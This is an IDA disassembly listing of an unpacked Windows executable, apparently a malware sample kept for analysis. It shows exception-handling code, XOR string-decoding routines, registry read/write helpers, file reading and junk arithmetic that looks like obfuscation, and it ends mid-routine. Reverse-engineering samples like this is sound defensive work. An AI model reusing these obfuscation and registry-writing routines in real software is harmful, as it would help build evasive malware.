;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : E2DF2485E8FCBA03BEA16B330FFB8D9F
; File Name : u:\work\e2df2485e8fcba03bea16b330ffb8d9f_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; DATA XREF: sub_401020+A�o
; sub_43F009+A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
xor eax, eax
inc eax
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
jz short locret_40101F
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40101F: ; CODE XREF: sub_401000+E�j
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401020 proc near ; CODE XREF: sub_40109A+BE�p
; sub_40109A+EC�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_40103D: ; CODE XREF: sub_401020+44�j
; sub_401020+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40106C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40106C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40103D
call dword ptr [ebx+esi*4+8]
jmp short loc_40103D
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401020+2A�j
; sub_401020+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_401020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107A proc near ; CODE XREF: sub_40109A+B1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_40CAB8 ; RtlUnwind
sub_40107A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401092 proc near ; DATA XREF: sub_40107A+B�o
; sub_43F063+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401092 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40109A proc near ; DATA XREF: sub_401219+10�o
; sub_407F79+A�o ...
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov dword_43C08C, eax
mov dword_43C090, ebx
test dword ptr [eax+4], 6
jnz loc_40117F
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov dword_43C090, eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4010DD: ; CODE XREF: sub_40109A+DC�j
cmp esi, 0FFFFFFFFh
jz loc_40118E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40116D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov dword_43C030, eax
mov edx, [ebp+var_14]
mov eax, [edx]
mov dword_43C034, eax
mov eax, [edx+4]
mov dword_43C038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_43C03C
mov esi, dword_43C034
rep movsd
lea edi, dword_43C03C
mov dword_43C034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40116D
js short loc_40117B
mov edi, [ebx+8]
push ebx
call sub_40107A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_401020
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_40116D: ; CODE XREF: sub_40109A+54�j
; sub_40109A+A9�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4010DD
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_40109A+AB�j
xor eax, eax
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_40117F: ; CODE XREF: sub_40109A+23�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_401020
add esp, 0Ch
loc_40118E: ; CODE XREF: sub_40109A+46�j
push 0
mov dword_43C010, 0Bh
push 0Bh
call sub_40CE48
add esp, 8
or eax, eax
jnz short loc_4011C9
push 0
mov dword_43C010, 8
push 8
call sub_40CE48
add esp, 8
or eax, eax
jnz short loc_4011C9
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_40109A+10C�j
; sub_40109A+126�j
cmp eax, 0FFFFFFFFh
jz short loc_4011F8
push eax
push dword_43C010
call sub_40CE48
add esp, 8
push dword_43C010
call sub_40CE30
add esp, 4
mov eax, 1
loc_4011F0: ; CODE XREF: sub_40109A+E3�j
; sub_40109A+12D�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_40109A+132�j
cmp dword_43C02C, 0
jnz short loc_401208
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_401208: ; CODE XREF: sub_40109A+165�j
mov eax, dword_43C02C
push 0Bh
jmp eax
sub_40109A endp
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_4011F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401219 proc near ; CODE XREF: start+500�j
; DATA XREF: start:loc_44A4FC�o
var_30 = word ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C01C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push eax
fnstcw [esp+30h+var_30]
or [esp+30h+var_30], 300h
fldcw [esp+30h+var_30]
add esp, 4
push 0
push 0
push offset dword_43C028
push offset dword_43C024
push offset dword_43C020
call sub_40CDD0
push dword_43C028
push dword_43C024
push dword_43C020
mov dword_43C014, esp
call sub_40C858
add esp, 18h
xor ecx, ecx
mov [ebp+var_4], ecx
push eax
call sub_40CE00
leave
retn
sub_401219 endp
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40129C proc near ; CODE XREF: sub_408FEB+27�p
; sub_408FEB+5F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43C09C
lea eax, ds:41B7D0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
mov [ebp+var_4], 86h
xor edi, edi
jmp short loc_4012E4
; ---------------------------------------------------------------------------
loc_4012CA: ; CODE XREF: sub_40129C+4A�j
mov eax, dword_43C09C
add eax, edi
lea eax, ds:41B7D0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0B7h
mov [eax], dl
inc edi
loc_4012E4: ; CODE XREF: sub_40129C+2C�j
cmp edi, esi
jl short loc_4012CA
mov [ebp+var_8], 209h
mov eax, dword_43C09C
add eax, esi
mov byte ptr ds:dword_41B7D0[eax], 0
xor edi, edi
mov edi, dword_43C09C
mov eax, edi
add eax, 5
add eax, esi
mov dword_43C09C, eax
cmp eax, 0E03h
jle short loc_401320
and dword_43C09C, 0
loc_401320: ; CODE XREF: sub_40129C+7B�j
lea eax, dword_41B7D0[edi]
pop edi
pop esi
leave
retn
sub_40129C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40132A proc near ; CODE XREF: sub_408165+144�p
var_14C2A = word ptr -14C2Ah
var_14C27 = byte ptr -14C27h
var_14C20 = dword ptr -14C20h
var_14C1C = byte ptr -14C1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 14C2Ch
call sub_40C8BC
push ebx
push esi
push edi
mov [ebp+var_4], 3479h
mov eax, [ebp+var_4]
mov edx, eax
add edx, eax
mov [ebp+var_4], edx
lea edi, [ebp+var_14C27]
lea esi, a7dRv ; "7d% r"
mov ecx, 7
rep movsb
push 0
push 0
push 3
push 0
push 0
push 80000000h
push offset dword_40F270
call sub_40CAD0 ; CreateFileA
mov [ebp+var_8], eax
mov [ebp+var_A], 1A22h
inc [ebp+var_A]
cmp eax, 0FFFFFFFFh
jnz short loc_401390
xor eax, eax
jmp loc_40142C
; ---------------------------------------------------------------------------
loc_401390: ; CODE XREF: sub_40132A+5D�j
mov ax, word_43C237
mov [ebp+var_14C2A+1], ax
push 0
lea eax, [ebp+var_14C20]
push eax
push 14C08h
lea eax, [ebp+var_14C1C]
push eax
push [ebp+var_8]
call sub_40CAAC ; ReadFile
call sub_40C9C8 ; GetTickCount
push [ebp+var_8]
call sub_40C9B0 ; CloseHandle
mov [ebp+var_B], 4Ch
movzx eax, [ebp+var_B]
imul eax, 5E4Ah
mov [ebp+var_B], al
xor ebx, ebx
loc_4013DA: ; CODE XREF: sub_40132A+F4�j
mov eax, 3
sub eax, dword_43C094
push eax
push offset byte_434080
lea eax, [ebp+ebx+var_14C1C]
push eax
call sub_401883
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_401407
xor eax, eax
inc eax
jmp short loc_40142C
; ---------------------------------------------------------------------------
loc_401407: ; CODE XREF: sub_40132A+D6�j
mov [ebp+var_10], 149Dh
add [ebp+var_10], 0E67h
add ebx, 11h
cmp ebx, [ebp+var_14C20]
jb short loc_4013DA
mov [ebp+var_14], 1204h
inc [ebp+var_14]
xor eax, eax
loc_40142C: ; CODE XREF: sub_40132A+61�j
; sub_40132A+DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_40132A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 4Ch
push esi
push dword ptr [ebp+8]
mov eax, dword_43C248
lea eax, ds:41A7B0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_401479
; ---------------------------------------------------------------------------
loc_40145F: ; CODE XREF: .text:0040147B�j
mov eax, dword_43C248
add eax, edi
lea eax, ds:41A7B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 92h
mov [eax], dl
inc edi
loc_401479: ; CODE XREF: .text:0040145D�j
cmp edi, esi
jl short loc_40145F
mov dword ptr [ebp-8], 1E9h
mov eax, dword_43C248
add eax, esi
mov byte ptr ds:dword_41A7B0[eax], 0
xor edi, edi
mov edi, dword_43C248
mov eax, edi
add eax, 4
add eax, esi
mov dword_43C248, eax
add dword_43C248, 3
cmp dword_43C248, 0DC7h
jle short loc_4014C1
and dword_43C248, 0
loc_4014C1: ; CODE XREF: .text:004014B8�j
lea eax, dword_41A7B0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014CB proc near ; CODE XREF: sub_4063C4+D2�p
; sub_408C17+130�p ...
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_2], 7C97h
movzx eax, [ebp+var_2]
imul eax, 4E81h
mov [ebp+var_2], ax
mov ebx, 63DEh
sub ebx, 64DDh
lea eax, [ebp+var_8]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CD58 ; RegOpenKeyExA
mov ebx, eax
lea edi, [ebp+var_10]
lea esi, aOajrO ; "oAjR;o-"
movsd
movsd
or ebx, ebx
jz short loc_40151E
xor eax, eax
jmp short loc_401575
; ---------------------------------------------------------------------------
loc_40151E: ; CODE XREF: sub_4014CB+4D�j
lea edi, [ebp+var_11]
lea esi, byte_43C254
xor ecx, ecx
inc ecx
rep movsb
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_8]
call sub_40CD64 ; RegQueryValueExA
mov ebx, eax
lea edi, [ebp+var_16]
lea esi, aNsg7 ; "nS7"
mov ecx, 5
rep movsb
push [ebp+var_8]
call sub_40CD4C ; RegCloseKey
lea edi, [ebp+var_17]
lea esi, word_43C25A
sub_4014CB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401565 proc near ; DATA XREF: .data:0044011D�o
xor ecx, ecx
inc ecx
rep movsb
or ebx, ebx
jz short loc_401572
xor eax, eax
jmp short loc_401575
; ---------------------------------------------------------------------------
loc_401572: ; CODE XREF: sub_401565+7�j
xor eax, eax
inc eax
loc_401575: ; CODE XREF: sub_4014CB+51�j
; sub_401565+B�j
pop edi
pop esi
pop ebx
leave
retn
sub_401565 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 4Ch
push esi
push dword ptr [ebp+8]
mov eax, dword_43C264
lea eax, ds:4351F0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_4015C2
; ---------------------------------------------------------------------------
loc_4015A8: ; CODE XREF: .text:004015C4�j
mov eax, dword_43C264
add eax, edi
lea eax, ds:4351F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 92h
mov [eax], dl
inc edi
loc_4015C2: ; CODE XREF: .text:004015A6�j
cmp edi, esi
jl short loc_4015A8
mov dword ptr [ebp-8], 1E9h
mov eax, dword_43C264
add eax, esi
mov byte ptr ds:dword_4351F0[eax], 0
xor edi, edi
mov edi, dword_43C264
mov eax, edi
add eax, 4
add eax, esi
mov dword_43C264, eax
add dword_43C264, 3
cmp dword_43C264, 0DC7h
jle short loc_40160A
and dword_43C264, 0
loc_40160A: ; CODE XREF: .text:00401601�j
lea eax, dword_4351F0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401614 proc near ; CODE XREF: sub_406073+B7�p
; sub_406073+E5�p ...
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_2], 7C97h
movzx eax, [ebp+var_2]
imul eax, 4E81h
mov [ebp+var_2], ax
mov ebx, 63DEh
sub ebx, 64DDh
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CD40 ; RegCreateKeyExA
mov ebx, eax
lea edi, [ebp+var_14]
lea esi, aOajrO_0 ; "oAjR;o-"
movsd
movsd
or ebx, ebx
jz short loc_401671
xor eax, eax
jmp short loc_4016DA
; ---------------------------------------------------------------------------
loc_401671: ; CODE XREF: sub_401614+57�j
lea edi, [ebp+var_15]
lea esi, byte_43C270
xor ecx, ecx
inc ecx
rep movsb
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_8]
call sub_40CD70 ; RegSetValueExA
mov ebx, eax
lea edi, [ebp+var_1A]
lea esi, aNsg7_0 ; "nS7"
mov ecx, 5
rep movsb
push [ebp+var_8]
call sub_40CD4C ; RegCloseKey
lea edi, [ebp+var_1B]
lea esi, word_43C276
xor ecx, ecx
inc ecx
rep movsb
or ebx, ebx
jz short loc_4016C5
xor eax, eax
jmp short loc_4016DA
; ---------------------------------------------------------------------------
loc_4016C5: ; CODE XREF: sub_401614+AB�j
cmp [ebp+var_C], 1
jnz short loc_4016D2
mov eax, 2
jmp short loc_4016DA
; ---------------------------------------------------------------------------
loc_4016D2: ; CODE XREF: sub_401614+B5�j
call sub_40C938 ; GetCurrentProcessId
xor eax, eax
inc eax
loc_4016DA: ; CODE XREF: sub_401614+5B�j
; sub_401614+AF�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401614 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 121h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C280
lea eax, ds:4383A0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_401727
; ---------------------------------------------------------------------------
loc_40170D: ; CODE XREF: .text:00401729�j
mov eax, dword_43C280
add eax, edi
lea eax, ds:4383A0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0F0h
mov [eax], dl
inc edi
loc_401727: ; CODE XREF: .text:0040170B�j
cmp edi, esi
jl short loc_40170D
mov dword ptr [ebp-8], 1BAh
mov eax, dword_43C280
add eax, esi
mov byte ptr ds:dword_4383A0[eax], 0
xor edi, edi
mov edi, dword_43C280
mov eax, edi
lea eax, [eax+esi+4]
mov dword_43C280, eax
inc dword_43C280
cmp dword_43C280, 0DC1h
jle short loc_40176D
and dword_43C280, 0
loc_40176D: ; CODE XREF: .text:00401764�j
lea eax, dword_4383A0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401777 proc near ; CODE XREF: sub_4056CB+141�p
; sub_408C17+6A�p ...
var_6 = byte ptr -6
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
lea edi, [ebp+var_3]
lea esi, byte_43C284
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+var_2], 46CBh
add [ebp+var_2], 66B1h
xor ebx, ebx
jmp short loc_4017C5
; ---------------------------------------------------------------------------
loc_40179D: ; CODE XREF: sub_401777+51�j
call sub_40CE3C
mov edi, [ebp+arg_0]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [edi+ebx], dl
inc ebx
loc_4017C5: ; CODE XREF: sub_401777+24�j
cmp ebx, [ebp+arg_4]
jl short loc_40179D
lea edi, [ebp+var_6]
lea esi, byte_43C285
mov ecx, 3
rep movsb
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov byte ptr [edx+eax], 0
mov eax, edx
pop edi
pop esi
pop ebx
leave
retn
sub_401777 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 121h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C290
lea eax, ds:42FD60h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_401833
; ---------------------------------------------------------------------------
loc_401819: ; CODE XREF: .text:00401835�j
mov eax, dword_43C290
add eax, edi
lea eax, ds:42FD60h[eax]
movsx edx, byte ptr [eax]
xor edx, 0F0h
mov [eax], dl
inc edi
loc_401833: ; CODE XREF: .text:00401817�j
cmp edi, esi
jl short loc_401819
mov dword ptr [ebp-8], 1BAh
mov eax, dword_43C290
add eax, esi
mov byte ptr ds:dword_42FD60[eax], 0
xor edi, edi
mov edi, dword_43C290
mov eax, edi
lea eax, [eax+esi+4]
mov dword_43C290, eax
inc dword_43C290
cmp dword_43C290, 0DC1h
jle short loc_401879
and dword_43C290, 0
loc_401879: ; CODE XREF: .text:00401870�j
lea eax, dword_42FD60[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401883 proc near ; CODE XREF: sub_40132A+C9�p
; sub_405415+7F�p ...
var_20 = byte ptr -20h
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_40C9D4 ; GetVersion
and [ebp+var_C], 0
call sub_40C968 ; RtlGetLastWin32Error
and [ebp+var_8], 0
jmp loc_40195C
; ---------------------------------------------------------------------------
loc_4018A3: ; CODE XREF: sub_401883+EB�j
call sub_40C968 ; RtlGetLastWin32Error
and [ebp+var_4], 0
mov [ebp+var_E], 137Ch
sub [ebp+var_E], 4443h
xor ebx, ebx
jmp loc_401942
; ---------------------------------------------------------------------------
loc_4018BF: ; CODE XREF: sub_401883+D0�j
call sub_40C9C8 ; GetTickCount
mov eax, [ebp+var_8]
add eax, ebx
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+ebx]
cmp eax, edx
jnz short loc_4018DE
inc [ebp+var_4]
loc_4018DE: ; CODE XREF: sub_401883+56�j
mov [ebp+var_14], 66A4h
mov eax, 216Dh
mul [ebp+var_14]
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018FB: ; CODE XREF: sub_401883+7D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018FB
cmp [ebp+var_4], eax
jnz short loc_401941
mov [ebp+var_1A], 73F8h
movzx eax, [ebp+var_1A]
imul eax, 1439h
mov [ebp+var_1A], ax
inc [ebp+var_C]
call sub_40C9D4 ; GetVersion
mov eax, [ebp+arg_8]
cmp [ebp+var_C], eax
jnz short loc_401930
mov eax, [ebp+var_8]
jmp short loc_401979
; ---------------------------------------------------------------------------
loc_401930: ; CODE XREF: sub_401883+A6�j
lea edi, [ebp+var_20]
lea esi, aPvX ; "PV |x"
mov ecx, 3
rep movsw
loc_401941: ; CODE XREF: sub_401883+82�j
inc ebx
loc_401942: ; CODE XREF: sub_401883+37�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_40194A: ; CODE XREF: sub_401883+CC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40194A
cmp ebx, eax
jb loc_4018BF
inc [ebp+var_8]
loc_40195C: ; CODE XREF: sub_401883+1B�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_401964: ; CODE XREF: sub_401883+E6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_401964
cmp [ebp+var_8], eax
jb loc_4018A3
mov eax, 0FFFFh
loc_401979: ; CODE XREF: sub_401883+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_401883 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C2A4
lea eax, ds:416400h[eax]
push eax
call sub_40CE18
add esp, 0Ch
mov dword ptr [ebp-4], 0C5h
xor edi, edi
jmp short loc_4019C3
; ---------------------------------------------------------------------------
loc_4019AC: ; CODE XREF: .text:004019C5�j
mov eax, dword_43C2A4
add eax, edi
lea eax, ds:416400h[eax]
movsx edx, byte ptr [eax]
xor edx, 0Ah
mov [eax], dl
inc edi
loc_4019C3: ; CODE XREF: .text:004019AA�j
cmp edi, esi
jl short loc_4019AC
mov dword ptr [ebp-8], 167h
mov eax, dword_43C2A4
add eax, esi
mov byte ptr ds:dword_416400[eax], 0
xor edi, edi
mov edi, dword_43C2A4
mov eax, edi
inc eax
add eax, esi
mov dword_43C2A4, eax
cmp eax, 0DB9h
jle short loc_4019FD
and dword_43C2A4, 0
loc_4019FD: ; CODE XREF: .text:004019F4�j
lea eax, dword_416400[edi]
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+10h]
mov ebx, [ebp+14h]
mov byte ptr [ebp-1], 9Dh
sub byte ptr [ebp-1], 6Bh
mov word ptr [ebp-4], 75F5h
add word ptr [ebp-4], 74D0h
mov edi, esi
jmp short loc_401A48
; ---------------------------------------------------------------------------
loc_401A2C: ; CODE XREF: .text:00401A4A�j
mov eax, [ebp+8]
movsx eax, byte ptr [eax+edi]
mov edx, edi
sub edx, esi
mov ecx, [ebp+0Ch]
movsx edx, byte ptr [ecx+edx]
cmp eax, edx
jz short loc_401A47
xor eax, eax
inc eax
jmp short loc_401A4E
; ---------------------------------------------------------------------------
loc_401A47: ; CODE XREF: .text:00401A40�j
inc edi
loc_401A48: ; CODE XREF: .text:00401A2A�j
cmp edi, ebx
jl short loc_401A2C
xor eax, eax
loc_401A4E: ; CODE XREF: .text:00401A45�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 25Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C2B0
lea eax, ds:434180h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_401A99
; ---------------------------------------------------------------------------
loc_401A82: ; CODE XREF: .text:00401A9B�j
mov eax, dword_43C2B0
add eax, edi
lea eax, ds:434180h[eax]
movsx edx, byte ptr [eax]
xor edx, 6Eh
mov [eax], dl
inc edi
loc_401A99: ; CODE XREF: .text:00401A80�j
cmp edi, esi
jl short loc_401A82
mov dword ptr [ebp-8], 0FDh
mov eax, dword_43C2B0
add eax, esi
mov byte ptr ds:dword_434180[eax], 0
xor edi, edi
mov edi, dword_43C2B0
mov eax, edi
lea eax, [eax+esi+3]
mov dword_43C2B0, eax
add dword_43C2B0, 2
cmp dword_43C2B0, 0E0Fh
jle short loc_401AE0
and dword_43C2B0, 0
loc_401AE0: ; CODE XREF: .text:00401AD7�j
mov dword ptr [ebp-0Ch], 94h
lea eax, dword_434180[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AF1 proc near ; CODE XREF: sub_4056CB+46�p
; sub_4063C4+43F�p ...
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
lea edi, [ebp+var_13]
lea esi, aT ; "#, t&"
mov ecx, 3
rep movsw
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call sub_40CAD0 ; CreateFileA
mov ebx, eax
mov [ebp+var_2], 2197h
add [ebp+var_2], 396h
cmp ebx, 0FFFFFFFFh
jnz short loc_401B55
mov [ebp+var_20], 0C9h
add [ebp+var_20], 0F1h
cmp [ebp+arg_4], 0
jz short loc_401B4C
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_401B4C: ; CODE XREF: sub_401AF1+53�j
call sub_40C9D4 ; GetVersion
xor eax, eax
jmp short loc_401BC5
; ---------------------------------------------------------------------------
loc_401B55: ; CODE XREF: sub_401AF1+45�j
push 0
push ebx
call sub_40C950 ; GetFileSize
mov [ebp+var_8], eax
lea edi, [ebp+var_14]
lea esi, byte_43C2BA
xor ecx, ecx
inc ecx
rep movsb
